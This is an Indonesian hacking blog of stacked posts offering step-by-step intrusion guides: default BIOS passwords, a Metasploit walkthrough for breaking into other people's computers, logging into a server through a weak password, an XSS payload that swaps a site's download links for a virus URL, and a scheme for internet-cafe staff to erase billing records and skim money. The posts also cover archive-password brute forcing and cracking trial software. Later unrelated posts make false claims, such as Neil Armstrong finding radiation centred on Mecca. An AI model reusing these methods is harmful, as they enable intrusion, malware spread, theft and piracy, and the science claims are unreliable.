Selasa, 04 Juni 2013

Cara Mudah Menjebol Password BIOS

Cara Mudah Menjebol Password BIOS - Kali ini Uzan Cyber akan berbagi info Cara Mudah Menjebol Password BIOS. Bagi yang lupa password BIOS nya ini artikel cocok banget.
langsung aja Cara Mudah Menjebol Password BIOS

Sekedar Info >>
Password BIOS memang sangat berguna untuk melindungi komputer agan supaya tidak ada orang lain yang dapat mengganti konfigurasi komputer agan. Tapi password tersebut bisa menjadi malapetaka jika agan lupa password nya.

Nah, jika agan lupa password BIOS agan sendiri, di bawah ini ane tampilkan default password yang aslinya memang disediakan oleh pembuatnya untuk mengantisipasi kejadian password yang terlupakan. Yang perlu Anda lakukan adalah mencoba satu per satu password tersebut sampai Anda menemukannya. hehe...

AWARD BIOS 
01322222, 589589, 589721, 595595, 598598, AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
PHOENIX
BIOS, CMOS, phoenix, PHOENIX
Password lainnya yang bisa Anda coba
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj


~SEMOGA BERMANFAAT~

Cara Menyusup Komputer Orang Dengan Metasploit

Cara Menyusup Komputer Orang Dengan Metasploit -  kali ini Uzan Cyber akan share Cara Menyusup Komputer Orang Dengan Metasploit. adalah METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.

Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 3.5, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 3.5 lebih banyak exploitnya  . Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim bufferOverflow pada system korban, sehingga kita dapat menTakeOver shellnya.
Langsung saja, berikut installasinya di Windows.

1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google,  usaha sedikit gan.

2.  Kemudian install, dan jalankan msfweb.


Maka akan muncul window shell seperti berikut.


3. Buka Web Browser bisa Internet Explorer, Mozilla, OperaMini, dll. Dan pergi ke http://127.0.0.1:55555, maka tampilannya seperti berikut.

Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti.

4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP, terus kita lakukan port scanning. Disini kita akan mencoba pada system OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada port scanning, pastikan port untuk MSRPC tebuka (default = open). Download NMAP di www.nmap.org

5.Memilih Exploit.
Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploit Microsoft RPC DCOM MSO3-026.

Pilih target pada pilihan Select Target

6. Memilih Payload

Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi2 payload :

win32_adduser : menambah user pada system korban
win32_bind : masuk ke shell korban
win32_bind_dllinject : untuk upload / inject dll files
win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (i like it  ).
win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).
win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban
win32_exec : mengeksekusi command di system korban.
Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.


RHOST ==>> Ip Address Korban (Remote).
LHOST ==>> Ip Address Kita (Local)
RPORT ==>> Port Korban
LPORT ==>> Local Open Port


Setelah diisi semua, kemudian klik exploit untuk mengHack. Hahaha
, selamat mencoba.

Cara Menjebol Server Komputer Orang

Cara Menjebol Server Komputer Orang - Kali ini Uzan Cyber akan membahas Cara Menjebol Server Komputer Orang. Pada kesempatan kali ini saya mencoba Membobol Komputer atau Server Orang lain dengan cara Exploit.

Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Bisa juga dikatakan sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan.

Disini  software yang saya pakai sesuai dengan urutannya yaitu:
- Zanmap DOWNLOAD DISINI
- Acunetix DOWNLOAD DISINI
- Putty DOWNLOAD DISINI

Teman-teman tidak usah khawatir apabila tidak cocok dengan software yang saya gunankan,tetapi menurut SAYA inilah software yang paling tepat untuk meng-exploit computer atau server orang lain.
Ga perlu lama lagi saya akan berikan step by step contoh  meng-exploit target yang kita inginkan.
-Pertama saya mencoba untuk men-scanning ip address 192.168.23.150 – 192.168.23.254 dengan menggunakan tools zenmap. Setelah saya melakukan scanning,saya mendapatkan ip address 192.168.23.234/112/23/111/45/240/160/150/151 pada jaringan 23.

 Ini adalah jaringan yang diketahui
 

contoh port yang terbuka


   PERHATIAN!
   - Di ip address 192.168.23.151 kita berpeluang untuk mengetahui informasi dan kelemah dikarenakan   banyak port yang terbuka
   - Banyaknya port yang terbuka yang merupakan server bayangan yang dibut oleh HoneyPot , oleh karena itu jangan kita harus jeli atau detail dalam melihat suatu port!

 ip address 192.168.23.234 dan 192.16823.240 termasuk ip yang aktif yaitu sebagai mikrotik.
 
  Setelah saya mengetahui port  yang terbuka dari IP yang kita serang. Saya akan scan kelemahan server tersebut.

ini merupakan software Acunetix
 Langkah pertama menggunakan software Acunetix dengan memasukan range IP dan port-port yang terbuka nya

Disini kita ceklis - next


terdapat target yang lebih detail


 ketika saya cek satu per satu saya mendapatkan Weak Password


Setelah saya menggunakan tools  Zanmap   dan Acunetix,tools yang saya gunakan terakhir yaitu putty.
Putty dipake di windows atau linux fungsinya untuk me-remote server agar kita tdk susah2 buat datangin server misal kita jauh dari server.


kita masukan ip address , port dan connection type yang kita butuhkan.Port yang di masukan yaitu 22(port terbuka)


 Di dalam putty ini kita harus memasukan Username dan Password.Password yang kita masukan tidak terlihat akan tetapi tercatat.Setelah itu,jika kita berhasil maka akan berada di posisi lab-sarage yang merupakan system.
Setelah selesai proses booting, kita ketikan ls untuk melihat ada apa saja didalamnya dan setelah di cek, file .txt lah yang berada didalam nya.

kita ketik "ls" untuk melihat ada apa saja didalamnya. Ternyata banyak file .txt disitu.
Sekarang kita telah memasuki server tersebut.
ketikan "touch <namafile>.txt disini saya menggunakan nama dan nrp saya. dan setelah itu "pico <namafile>.txt untuk membuka file nya dan mengeditnya
Bagaimana kalau kita sedikit jahil,dengan memasukkan file .txt ke dalamnya.
Banyak yang bisa kita lakukan di putty,salah satu nya yaitu menuliskan kata-kata atau kalimat tanpa sepengetahuan pemilik/pemakai,

Sekian penjelasan tentang EXPLOIT dari saya.Semoga bermanfaan untuk para pembaca.

Cara Menyebarkan Virus Dengan XSS

Cara Menyebarkan Virus Dengan XSS - Kali ini Uzan Cyber akan membahas Cara Menyebarkan Virus Dengan XSS. Cara Menyebarkan Virus Dengan XSS Agar kalian bisa mengetahui, pake tools apa sih para virus creator untuk menyebarkan virusnya?

Semua pasti bertanya-tanya, para virus creator menggunakan apa sih untuk menyebarkan virus? Berikut ini adalah beberapa cara bagaimana virus creator menyebarkan virusnya:
1. Email
2. Phising
3. USB
4. Hacking
5. Cracking

Kita memilih dengan cara Hacking & Cracking yaitu dengan menggunakan XSS!
Skenarionya adalah :
1. Kita memiliki situs virus / menempatkan sebuah virus di situs, misal: http://www.situssaya.com/virussaya.exe

2. Kita memiliki target yang memiliki vulnerability untuk CSS, misalkan: http://www.target.com/index.php?download=<script>alert(“BinusHacker Was Here”)</script> apabila muncul alert box, berarti website tersebut memiliki vulnerability.
Bagi yang menggunakan Mozilla Firefox, silakan download tools berikut untuk melakukan check XSS:
DOWNLOAD DISINI

Nah, langsung saja pada praktek!
Ubah saja yang ada di web target menjadi seperti berikut untuk menyebarkan virus:
http://www.target.com/index.php?download=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.situssaya.com/virussaya.exe”; }</script>

Kesimpulan:
Setiap ada user yang melakukan download di website tersebut, yang akan terdownload adalah virus yang kita miliki.
Gunakan imajinasi anda, agar bisa lebih berkreasi kembali.
Berikut adalah contoh, penjelesan dan video mengenai XSS Persistence Demo



Semoga artikel di atas bermanfaat & selamat berkreasi

E-BOOK HACKING 1

Bagi Teman-teman yang ingin belajar dunia HACKING mungkin agak
bingung,,,nah bagi yang belum tau mau belajar di mana,,,,, nah kalai ini saya
akan memberikan Link E-book yang bisa kalaian download di bawah disini
 apa aja isi ebook pastinya banyak bgt dunkk,,,, nah kalain cobain aja
satu demi satu,,,,,

- Membuat Bootable XP dalam sebuah CD
- Membuat shortcut One Click Shutdown dan Restart
- Membuat Universal Ghost dalam CD maupun FD
- Teknik Debuging
- Menghapus file yang tidak dapat terhapus
- Panduan pemilihan kamera digital
- Konsep DirectX
- Teknik kompresi
- Teknik menghilangkan Send Error Report
- Teknik memanipulasi logi windows
- Download musik secara lagal
- Download paypal tanpa membayar
- Download dari FTPz
- Download MP3 tanpa filesharing
- Download Video dan MP3 dengan Media Player
- Download Timeframe
- DVD Copy-Ripping
- Teknik disconnect dan reconnect fari broadband
- Teknik mudah mencari serial number dengan Google
- Teknik Hacking Ebay
- Keyboard Shortcut
- Hacking administrator windows
- Teknik Hacking unlimited bandwidth dari hosting gratis
- Google Hacking
- Google tips dan trik
- Rahasia Google
- Memperbaiki Harddisk
- Hardware Firewall
- Teknik Memblok website tanpa software
- Tweeking windows
- Teknik Hacking Bios
- Konversi file system
- Teknik SEO
- Key Generator
- Menghapus DRM Protection Video
- Teknik pencarian Rapidshare
- Teknik menyembunyikan files
- Menyelamatkan komputer dari crash
- Setting DNS
- Setting FTP server
- Setting direct connect
- Setting proxy
- Setting http request
- Hacking Newsgroup
- Linux
- Menginstal Linux
- Hacking IRC
- Mencari file di IRC
- Hacking E-mail
- Phising
- Keylogger
- Hacking foto
- Hacking database
- Hacking faq
- Hacking TRW
- Hacking wabpages
- Hacking Netbios
- Phreaking
- Spyware
- Virus
- Trojan
nah itu baru sebagian  aja masih banyak bgt tuhh
DOWNLOAD AJA GAN!!!!!!!!!!
- LINK DOWNLOAD 1
- LINK DOWNLOAD 2
- LINK DOWNLOAD 3
- LINK DOWNLOAD 4

E-BOOK HACKING 2

Disini saya lagi akan membagikan E-BOOK Hacking namanya Hacker
underground Handbook disini mengulas banyak tentang darimana ita
memulai hacking sampai Pro Buku ini disusun oleh David melnichuck
seorang penulis dan ahli hacking dan security ne blognya
http://www.mrcracker.com
kita tengok yuk apa aja isi E-bookNYA....

Pendahuluan
- Apa itu Hacker?
- Hacker dan penggolonganya
- Mengapa menjadi seorang Hacker

Pemrograman
- Perlukah mempelajarinya?
- Dimana saya harus memulai?
- Cara belajar terbaik

Password
- Password Cracking
- Phising
- Program-program pencuri password

Network Hacking
- Foot Printing
- Port Scanning
- Banner Grabbing
- Searching the Vulnerabilities
- Penetrating

Wirelless Hacking
- Scanning wireless network
- Cracking WEP
- Packet Sniffing

Windows Hacking
- NetBios
- Cracking windows password

Malware
- Definisi
- Prorat

Web Hacking
- Cross site scripting
- Remote file inclusion
- Local file inclusion

DOWNLOAD THE HACKER'S UNDERGROUND HANDBOOK GRATIS

Hacking Billing Warnet Tanpa Software Untuk Operator

Cara ini saya dapatkan dari teman saya om Doza Cracker, bagi kalian yang mempunyai pekerjaan sebagai operator / penjaga warnet bisa menggunakan cara ini untuk mendapatkan keuntungan tanpa diketahui bos anda si pemilik warnet (bahasa lembutnya korupsi haha). Langsung aja ya





1. Pertama-tama, close kan billing explorernya. trus dimintai password. isikan password defaultnya 008
2. Kemudian masuk ke tempat dimana folder billing explorer disimpan. Biasanya sih ada di
D:\Billing Explorer\Explorer Billing\Billing Warnet Explorer
3. Kemudian cari file bill01.008
4. kemudian copy kan file bill01.008 tadi ke My Document aja ya. atau terserah dimana anda mau. INGAT. File bisa di copy kalau billing explorernya sudah kita CLOSE. jadi, lakukan dulu langkah 1. oke?
5. Setelah itu buka lagi aplikasi billing explorernya. Selesai untuk tahap pertama

Kalau ada user yg selesai main, otomatis bertambah lagi kan "REPORT DATABASE B-EXP" nya biarkan saja gan. Misal, user selesai main dan kena Rp.5000
Lanjut, kita CLOSE kan lagi billing explorenya.Lakukan langkah2 diatas yaa

Kalau langkah no.1 udah di selesaikan, sekarang kita masuk ke langkah:
a. Copy file bill01.008 yang ada di My Document tadi. kemudian paste kan ke
D:\Billing Explorer\Explorer Billing\Billing Warnet Explorer
Eits, disitu udah ada namanya, jadi kita rename dulu. trus yg kita copy tadi paste kan ke yang barusan w sebutin
b. kemudian buka lagi aplikasi billing explorernya. Coba lihat, yg Rp.5000 barusan selesai tadi ada gak? ternyata gak ada gan. jadi beres deh kita akali databasenya

Untuk menghilangkan jejak, kita hapus file yang barusan kita rename tadi, trus hapus deh yg di Recycle Bin

Mungkin cara ini bisa digunakan di Billing Billing lain yg menggunakan database. tapi coba aja dulu ya, soalnya ane cuma berhadapan di Billing Explorer

Oh iya, ane emang gunain ini tanpa software karena di warnet w EXE di Block. jadi kagak bisa install software atau apa lah. Dan maaf kagak bisa disertai Screen Shot / gambar / tutorial dalam bentuk video.
Fvck to Teknisi =))


Source: Doza Cracker - Trial error and then do it
www.id-fb.com
Dedicate for: MBT - Cyber X-Plorer - Cyber4rt - Deface Zone


#Artikel Hacking Billing Warnet Tanpa Software Untuk Operator ini diterbitkan hanya untuk pembelajaran, semua akibat yang ditimbulkan tidak ditanggung penulis

Teknik Hacking yang Sering Digunakan Oleh Hacker Dunia




Saat ini sudah banyak kasus pencurian data terjadi pada website jejaring sosial seperti facebook, friendster, myspace dan lain-lain. Hasil data curian tersebut dapat berupa profil lengkap, password account, dan bahkan nomor kartu kredit seseorang yang semuanya dapat digunakan untuk kejahatan.

Berikut ini adalah cara para hacking yang dilakukan para hacker yang perlu diketahui agar anda terhindar dari kejahatan cyber tersebut

1. Soscial Engineering Tools.
Cara trik menipu si korban dengan media telepon maupun internet, mengkonsentrasikan diri pada rantai terlamah sistem jaringan komputer, yaitu manusia. Cara initelah dikenal sejak lama dan yang paling mudah untuk dilakukan para hacker untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi tersebut kepada korban atau pihak lain yang mempunyai informasi itu

2. Phising Tools.
Tindakan menipu dengan cara menyamar memalsukan yang asli. biasanya dengan media email, instant messenger dan website palsu

3. Sniffing Tools
Cara trik mengendus dan menyadap informasi pada jaringan komputer wireless maupun kabel dengan memakai software seperti cain able, aircrack, snort, nmap.

4. Keylogger Tools
Hampir sama dengan tindakan snifing namun sumber penyadapan langsung dari ketikan yang tejadi pada aktivitas keyboard. Biasanya hacker memasangnya pada akses internet umum, seperti di warnet dan lain-lain. Hasil penyadapan berupa nfile log ataupun catatan yang dapat tersimpan di hardisk maupun langsung terkirim ke email hacker.

5. Brute Force Tools
Tindakan ini merupakan serangan langsung yang dilakukan hacker ke website profil korban, dengan software berbasis pemprograman php yang di upload ke sebuahweb hosting yang kemudian dijalankan oleh hacker dari sanadan memakai kamus bahasa untuk menembak password account korban.

6. Facebook Application Tools
Triknya hacker dapat mengakses data-data penting komputer anda ketika anda memasang aplikasi tersebut di profil.

7. Exploits Vulnerability Tools.
Ini adalah teknik hacking yang selalu update, yaitu dengan mencari kelemahan dari sistem website, misalnya infrastruktur jaringan atau operating system, database atau script programingnya untuk mengetahui share update kelemahan apa saja yang terdapat pada site tersebut.

8. Plagiat
Ini adalah trik hacking dengan cara meminta ID dan password dengan cara para hacker mengatasnamakan developer, master, admin dan lain-lain pada website game dan sebagainya. Sebagai contoh pada facebook.com banyak user yang menggunakan nama nama orang besar.

Semua tindakan hacking di atas adalah teknik hacking yang sering digunakan oleh hacker untuk membobol password website akun profil mauoun ID game yang dapat mendatangkan banyak uang. Tulisan di atas mengenai teknik hacking yang sering digunakan oleh hacker dalam mencuri akun hanyalah unutk pengetahuan bukan untuk melakukan kejahatan cyber. Jika anda mencoba untuk mempelajari, harap hati-hati dengan file di internet yang disebutkan sebagai software hacking namun itu adalah virus komputer.

Mungkin hanya itu yang dapat saya sampaikan pada posting saya kali ini. Semoga bermanfaat untuk sobat sekalian.

20 Istilah Dalam Dunia Hacking Yang Perlu Di Ketahui

Berikut Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui :
1). Bug
-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.
2). Patch
-> Perbaikan terhadap bug dengan mengupdate sistem yang memiliki vurnerable system.
3). Vurnerable
-> Sistem yang memiliki bug sehingga rentan terhadap serangan.
4). RFI
-> Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load.
5). LFI
-> Suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable ( Vulnerable LFI maksudnya ).
6). SQL Injection
-> Salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.
7). DDoS
-> Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.
8). Shell
-> Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya.
9). Deface
-> Merubah tampilan halman suatu website secara paksa dan illegal.
10). Debug
-> Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.
11). XSS
-> Adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.
12). Phising
-> Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.
13). Keylogger
-> Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)
14). Fake Login
-> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.
15). Fake Process
-> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".
16). Malicious Code/Script
-> Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.
17). Virus
-> Kode jahat yang sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yang terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.
18). Worm
-> Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.
19). Trojan
-> Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.
20). Backdoor
-> Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.
Sebetulnya istilah-istilah dalam dunia hacking itu banyak, tapi hanya 20 point saja yang saya tulis disini, dan untuk istilah hacking lainnya, sobat bisa cari digoogle. Sekian postingan saya kali.

Cara Menjebol Password File RAR Dan ZIP

Cara Menjebol Password File RAR Dan ZIP - Postingan Kali ini ane kembali share ilmu ane. Yak cara Membobol Password Winrar/Rar. Sebenarnya mudah untuk menegetahui semua itu. Di Uzan Blog akan dituntaskan habis

Nah, Kali ini saya akan memberikan kepada anda solusi untuk membuka file rar anda yang di proteksi dengan password. Sebelum nya tentu anda bertanya-tanya bagaimana membuat rar agar bisa dibuka tanpa password atau bagaimana cara membobol password pada winrar. Di Website ini anda akan menemukan caranya.:

1./ Langkah pertama adalah langkah yang polos. Yaitu dengan mengcopy nama file rar anda. Kemudian cari digoogle dengan kata kunci nama file tersebut ditambah dengan kata kunci "password" misal "password NAMAFILE.rar". Kalo tidak ketemu, lihat langkah no 2.

2./ Nah jika cara pertama masih juga belum ketemu sehingga jangankan men jebol, membuka saja tidak bisa. coba kamu pakai software remover password winrar.
Download DISINI

#Kalo Yang Nih Cara Lainya :
~Menjebol password ZIP~

Utk menjebol file ZIP, pake ZIP Password Finder, ukurannya sangat kecil, 483 kb (sebelum diekstrak) bisa didownload DISINI (Freeware)
-Ekstrak file tadi, lalu install.
-Jalankan program, lalu pilih Open dan pilih file ZIP yg terkunci.
-Setelah terpilih, pd opsi Char Type Property, saran saya pilih saja dulu Alpha (lower)(a-z), utk mencari   hanya karakter lowercase, karna password jarang sekali yg terdapat karakter uppercase. Setelah itu Max Password Length cukup 6 atau 7 saja dulu. Kalau sudah klik Start. Utk menampilkan proses pencarian password, bisa klik tombol Display On.
-Prosesnya mungkin memakan waktu agak  lama, silahkan tunggu saja.
-Setelah password tertebak, silakan dicoba mengekstrak file yg terkunci tadi & masukan passwordnya.  Kalo password benar, maka kt akan berhasil mengekstrak file tsb!!
~Menjebol password RAR~

Menjebol password RAR menggunakan RAR Password Recovery, silakan download DISINI (Shareware)
-Ekstrak, lalu install
-Sama seperti yg tadi, Open file RARnya
-Lalu pd opsi Allowed Character pilih saja All Printable Symbol. Lalu Type of Attack pilih Brute Force (utk mencoba segala kemungkinan). Lalu utk Password Length: Minimal Length 3 & Maximal Length 6 ato 7.
-Terakhir, utk opsi Start from sebaiknya ketik abc. Klik Start.
-Tunggu prosesnya, lalu akan didapatkan password RARnya
~SELAMAT MENCOBA~

Cara membuat crack sederhana software trial (Illegal)

Mengakali suatu software bajakan menjadi asli adalah suatu yang bisa dibilang suatu tindakan ilegal, saya disini akan menjelaskan tentang tutorial cara membuat software trial menjadi full version. 
Cara ini saya sebenarnya saya tujukan hanya untuk pelajaran semata, dan bukan untuk mendorong adanya tindakan-tindakan illegal, khusunya dalam pembajakan software dalam dunia IT.
Ok, untuk mengetahui lebih lanjut tentang membuat crack sederhana untuk software berbayar/trial/komersil/shareware, cara ini sangat sederhana, sehingga mudah dilakukan oleh siapapun, untuk lebih lanjut silahkan ikuti cara dibawah ini :

1. Untuk langkah awal, kita bisa mencari terlebih dahulu software/aplikasi yang sudah “full version” yang sama dengan software “trial” yang ingin kita buat crack nya.
2.  Pilih “START” lalu “RUN”.
3.  Lalu dilangkah ketiga ini kita ketik “REGEDIT” di tempat kosong pada “RUN” dan Enter/OK. seperti gambar di bawah ini
4. ketika “registry editor” muncul seperti gambar di bawah ini, silahkan kita cari terlebih dahulu “registry” aplikasi yang kita maksud.
5. Lalu pada langkah kelima ini kita lakukan klik kanan di tempat dimana “folder registry” aplikasi/software yang kita mau bikin untuk crack-an nya, kemudian pilih export, dan setelah itu simpan (terserah mau di simpen dimana, asal jangan sampe lupa :)) untuk lebih jelasnya silahkan lihat gambar dibawah ini.
6. Lalu setlah kita simpen folder registry tadi yang sudah mengandung crack nya, kita buka registry editor di tempat dimana software atau aplikasi tersebut masih trial tersebut.
7. Lalu pilih “file” dan pilih “import” kemudian gunakan “registry yang tadi telah kita simpan”.
8. Dilangkah terakhir ini kita bisa lakukan restart pada komputer kita, dan setelah komputer menyala lagi maka software yang tadi nya “TRIAL” akan menjadi “FULL” dan “REGISTRY” yang tadi kita buat bisa kita gunakan kembali pada software yang sama.

Jumat, 24 Mei 2013

KA'BAH ADALAH PUSAT BUMI


Istilah Ka’bah diambil dari kata ka’bu yang berarti “mata kaki” atau tempat kaki berputar bergerak untuk melangkah, bisa juga berarti “mata bumi” atau “sumbu bumi” atau kutub putaran utara bumi. 
Neil Amstrong membuktikan bahwa Kota Mekkah adalah pusat dari planet Bumi. Ketika ia untuk pertama kali melakukan perjalanan ke luar angkasa dan mengambil gambar planet Bumi, ia menyebutkan bahwa ternyata radiasi berpusat di Kota Mekkah, tepatnya di Ka’bah. Para peneliti muslim mempercayai bahwa radiasi ini menghubungkan antara Ka’bah di planet Bumi dengan Ka’bah di alam akhirat.

RAHASIA ANGKA 7 Al-QURAN


Dalam al-Qur’an Allah menyebutkan bahwa langit diciptakan dengan tujuh lapis.
Salah satunya disebutkan dalam ayat berikut ini, “Dan Dia (Allah) berkehendak (menciptakan) langit, lalu dijadikan-Nya tujuh langit.” (QS. al-Baqarah: 29). Nah, di dalam al-Qur’an ternyata penyebutan soal penciptaan langit dengan tujuh lapis juga disebutkan sebanyak tujuh kali. Tidak percaya? Coba saja Anda tengok! Tujuh ayat tersebut adalah QS. al-Baqarah: 29, QS. al-Isra: 44, QS. al-Mukminun: 86, QS. Fushilat: 12, QS. ath-Thalaq: 12, QS. al-Mulk: 3, QS. Nuh: 15. Inilah kebesaran Allah.

MEKKAH ADALAH KOTA INDUK


Allah berfirman di dalam al-Qur’an, “Demikianlah Kami wahyukan kepadamu Al-Qur'an dalam bahasa Arab supaya kamu memberi peringatan kepada Ummul Qura (penduduk Makkah) dan penduduk (negeri-negeri) sekelilingnya.” (QS. asy-Syura: 7)
Kata ummul qura berarti induk bagi kota-kota lain. Kata ummu (ibu) mempunyai arti yang penting di dalam kultur Islam. Sebagaimana seorang ibu adalah sumber dari keturunan, maka Mekkah juga merupakan sumber dari semua negeri lain. Selain itu, kata ‘ibu’ memberi Mekkah keunggulan di atas semua kota lain.

Rahasia Kekokohan Bangunan Piramida Karya Fir’aun


Fir’aun adalah raja Bani Israil yang digambarkan secara jelas dalam al-Qur’an. Penggambaran sosoknya agar dijadikan pelajaran sebagai sosok yang durhaka pada Allah swt. Salah satu karya terbesarnya adalah piramida. Meski terbuat dari tanah liat, bangunan tersebut sangat kuat.
Profesor Gilles Hug, dan Michel Profesor Barsoum menegaskan bahwa Piramida terbuat dari dua jenis batu: batu alam dan batu-batu yang dibuat secara manual. Fir’aun menggunakan jenis tanah slurry.

LAUT TERBELAH DI KOREA


Ada yang bertanya, benarkah Laut Merah di zaman Nabi Musa pernah terbelah, seperti kabar yang diungkapkan dalam al-Qur’an.
Nah, fenomena laut terbelah ternyata terjawab sudah. Di Korea Selatan, dua kali setahun terjadi kejadian hal semacam ini, namanya ‘Moses Miracle’. Air laut menjadi surut dan terbuka menjadi suatu alur daratan sepanjang 2,8 km dan lebar 40 meter yang menghubungkan Pulau Jindo dan Modo selama beberapa jam. Peristiwa ini dihadiri oleh orang-orang di penjuru dunia sejak diketahui pertama kali pada tahun 1975.[ ]

Dakwah Rasul Kepada Bangsa Jin


Suatu ketika, Al-Qamah bertanya kepada Ibnu Mas’ud perihal siapa saja yang telah menemani Rasul untuk menemui bangsa jin (baca: untuk berdakwah). Saat itu, Ibnu Mas’ud menjelaskan bahwa suatu malam, para sahabat pernah tidak melihat Rasulullah saw. Setelah dicari, Rasul tetap tidak kelihatan. Para sahabat pun sangat khawatir. Apalagi, saat itu kaum kafir Quraisy sedang gencar-gencarnya melancarkan tipu muslihat untuk mencelakakan Nabi saw. Mereka mengira, beliau telah diculik kaum kafir Quraisy. Sepanjang malam, para sahabat dilanda kegelisahan dan perasaan yang tidak menentu. Mereka tidak bisa tidur karena menunggu kabar tentang keberadaan Rasulullah.
 
Nabi berdakwah kepada bangsa jin, mungkinkah? Ya,  dalam berdakwah, Nabi tidak saja didatangi para jin muslim, tapi juga kerapkali mendatangi tempat jin berkumpul.
Menjelang pagi hari, mereka melihat Rasulullah muncul dari arah gua Hira. Melihat kedatangan Rasulullah tersebut, serentak para sahabat sangat lega dan gembira. Mereka kemudian mengabarkan kepada Rasulullah ihwal kegelisahan mereka selama semalam suntuk karena tak melihat beliau.
Mereka pun melontarkan kekhawatiran mereka perihal keselamatan Nabi saw dan kemungkinan-kemungkinan buruk yang mereka perkirakan bakal menimpa Rasul. Mereka merasa bersyukur, karena Nabi yang mereka cintai ternyata tidak mengalami peristiwa seperti yang mereka khawatirkan.
Rasul dapat memahami kekhawatiran para sahabatnya itu. Beliau pun kemudian menjelaskan tentang apa sebenarnya yang telah terjadi kepada dirinya, “Sesungguhnya para mubaligh dari bangsa jin telah datang menemuiku. Maka, mereka kudatangi dan kemudian aku membacakan ayat-ayat al-Qur’an untuk mereka.”
Untuk meyakinkan para sahabat tentang apa yang beliau katakan, Rasulullah mengajak para sahabat menelusuri jejak beliau. Pada jejak-jejak itu juga terdapat jejak para jin yang berkumpul dan bekas api yang mereka bawa sebagai alat penerangan.
Menurut penafsiran Al-Suhaili sebagaimana dilansir Abu Azka Fathin Mazayasyah dan Ummi Alhan Ramadhan M dalam buku Bercinta Dengan Jin, jin yang masuk Islam lewat bacaan ayat-ayat al-Qur’an yang diperdengarkan oleh Rasulullah semula berasal dari agama Yahudi, yaitu pengikut Nabi Musa as.
Sementara Ibnu Salam memiliki pandangan yang sama tentang hal itu. Ia menambahkan, peristiwa tersebut berlangsung dalam masa tiga tahun sebelum ia hijrah ke Madinah. Juga sebelum terjadinya peristiwa Isra Mi’raj.
Adapun mengenai jumlah jin yang hadir saat itu, menurut Ibnu Ishak, ada tujuh jin saja. Ibnu Hatimmenjelaskan secara lebih spesifik lagi. Menurutnya, dari tujuh jin itu, tiga jin berasal dari Haran dan empat jin dari Nashibin.
